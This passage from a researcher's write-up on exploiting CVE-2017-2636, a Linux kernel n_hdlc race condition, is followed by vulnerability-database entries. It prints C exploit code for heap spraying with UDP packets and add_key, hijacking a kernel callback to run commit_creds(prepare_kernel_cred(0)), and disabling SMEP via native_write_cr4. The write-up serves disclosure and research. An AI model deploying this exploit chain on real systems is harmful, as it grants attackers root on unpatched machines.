a lot of sockets using `socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)`: * one client socket for sending UDP packets, * one dedicated server socket, which is likely to receive two packets with the same `sk_buff.head`, * 200 server sockets for receiving other packets emitted during heap spray, * 200 server sockets for receiving the packets emitted during slab exhaustion. Ok. Now we need another kernel object for overwriting the function pointer in `skb_shared_info.destructor_arg`. We can't use `sk_buff.head` for that again, because `skb_shared_info` is placed at the same offset in `sk_buff.head` and we don't control it. I was really happy to find that `add_key` syscall is able to allocate the controllable data in the `kmalloc-8192` too. But I became upset when encountered key data quotas in `/proc/sys/kernel/keys/` owned by root. The default value of `/proc/sys/kernel/keys/maxbytes` is 20000\. It means that only 2 `add_key` syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough. But the happiness returned when I encountered the bright idea at the [slides](https://speakerdeck.com/retme7/talk-is-cheap-show-me-the-code) of Di Shen from [Keen Security Lab](http://keenlab.tencent.com/en/): I can make the heap spray successful even if `add_key` fails! So, let's look at the `init_payload()` code: ``` #define MMAP_ADDR 0x10000lu #define PAYLOAD_SZ 8100 #define SKB_END_OFFSET 7872 #define KEY_DATA_OFFSET 18 int init_payload(char *p) { struct skb_shared_info *info = (struct skb_shared_info *)(p + SKB_END_OFFSET - KEY_DATA_OFFSET); struct ubuf_info *uinfo_p = NULL; ``` The definition of `struct skb_shared_info` and `struct ubuf_info` is copied to the exploit code from [`include/linux/skbuff.h`](http://lxr.free-electrons.com/source/include/linux/skbuff.h) kernel header. The payload buffer will be passed to `add_key` as a parameter, and the data which we put there at `7872 - 18 = 7854` byte offset will exactly overwrite `skb_shared_info`. ``` char *area = NULL; void *target_addr = (void *)(MMAP_ADDR); area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (area != target_addr) { perror("[-] mmap\n"); return EXIT_FAILURE; } uinfo_p = target_addr; uinfo_p->callback = (uint64_t)root_it; info->destructor_arg = (uint64_t)uinfo_p; info->tx_flags = SKBTX_DEV_ZEROCOPY; ``` The `ubuf_info.callback` is called in [`skb_release_data()`](http://lxr.free-electrons.com/ident?i=skb_release_data) if `skb_shared_info.tx_flags` has `SKBTX_DEV_ZEROCOPY` flag set to 1\. In our case, `ubuf_info` item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP. Anyway, now the `callback` points to `root_it()`, which does the classical `commit_creds(prepare_kernel_cred(0))`. However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon. #### Heap spraying and stabilization As I mentioned, `n_hdlc_release()` frees thirteen `n_hdlc_buf` items. Our `exploit_skb()` is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket. Now we are going to perform the use-after-free on `sk_buff.data`: * receive 4 network packets on the dedicated server socket one by one, * execute several `add_key` syscalls with our payload after receiving each of them. The exact number of `add_key` syscalls giving the best results was found empirically by testing the exploit many times. The example of `add_key` call: ``` k[0] = syscall(__NR_add_key, "user", "payload0", payload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING); ``` If we won the race and did the heap spraying luckily, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory: ``` for (i = 0; i < KEYS_N; i++) { if (k[i] > 0) syscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]); } ``` Now we need to prepare the heap to the next round of `n_hdlc` racing. The `/proc/slabinfo` shows that `kmalloc-8192` slab stores only 4 objects, so double-free error has high chances to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable – send a dozen UDP packets to fill the partially emptied slabs. ### SMEP bypass As I mentioned, the `root_it()` shellcode resides in the userspace. Executing it in the kernelspace is detected by [SMEP](http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/) (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register. There are several approaches to defeat it, for example, Vitaly Nikolenko [describes](https://www.syscan360.org/slides/2016_SG_Vitaly_Nikolenko_Practical_SMEP_Bypass_Techniques.pdf) how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known. In [`arch/x86/include/asm/special_insns.h`](http://lxr.free-electrons.com/source/arch/x86/include/asm/special_insns.h) I've found this function: ``` static inline void native_write_cr4(unsigned long val) { printk("wcr4: 0x%lx\n", val); asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order)); } ``` It writes its first argument to CR4. Now let's look at `skb_release_data()`, which executes the hijacked `callback` in the Ring 0: ``` if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) { struct ubuf_info *uarg; uarg = shinfo->destructor_arg; if (uarg->callback) uarg->callback(uarg, true); } ``` We see that the destructor `callback` takes `uarg` address as the first argument. And we control this address in the exploited `sk_buff`. So I've decided to write the address of `native_write_cr4()` to `ubuf_info.callback` and put `ubuf_info` item at the mmap'ed userspace address `0x406e0`, which is the correct value of CR4 with disabled SMEP. In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable. So let's initialize the payload a bit differently: ``` #define CR4_VAL 0x406e0lu void *target_addr = (void *)(CR4_VAL & 0xfffff000lu); area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (area != target_addr) { perror("[-] mmap\n"); return EXIT_FAILURE; } uinfo_p = (struct ubuf_info *)CR4_VAL; uinfo_p->callback = NATIVE_WRITE_CR4; info->destructor_arg = (uint64_t)uinfo_p; info->tx_flags = SKBTX_DEV_ZEROCOPY; ``` That SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1\. Otherwise `target_addr` becomes 0 and `mmap()` fails, since mapping the zero page is not allowed. ## Conclusion Investigating of `CVE-2017-2636` and writing this article was a big fun for me. I want to thank [Positive Technologies](https://www.ptsecurity.com/ww-en/) for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.
idSSV:92755
last seen2017-11-19
modified2017-03-09
published2017-03-09
reporterRoot
titleLinux kernel local privilege escalation flaw in n_hdlc(CVE-2017-2636)

The Hacker News

idTHN:FA88848EF7446185D7481A0AB338ACA7
last seen2018-01-27
modified2017-03-16
published2017-03-16
reporterSwati Khandelwal
sourcehttps://thehackernews.com/2017/03/linux-kernel-vulnerability.html
titleLinux Kernel Gets Patch For Years-Old Serious Vulnerability

References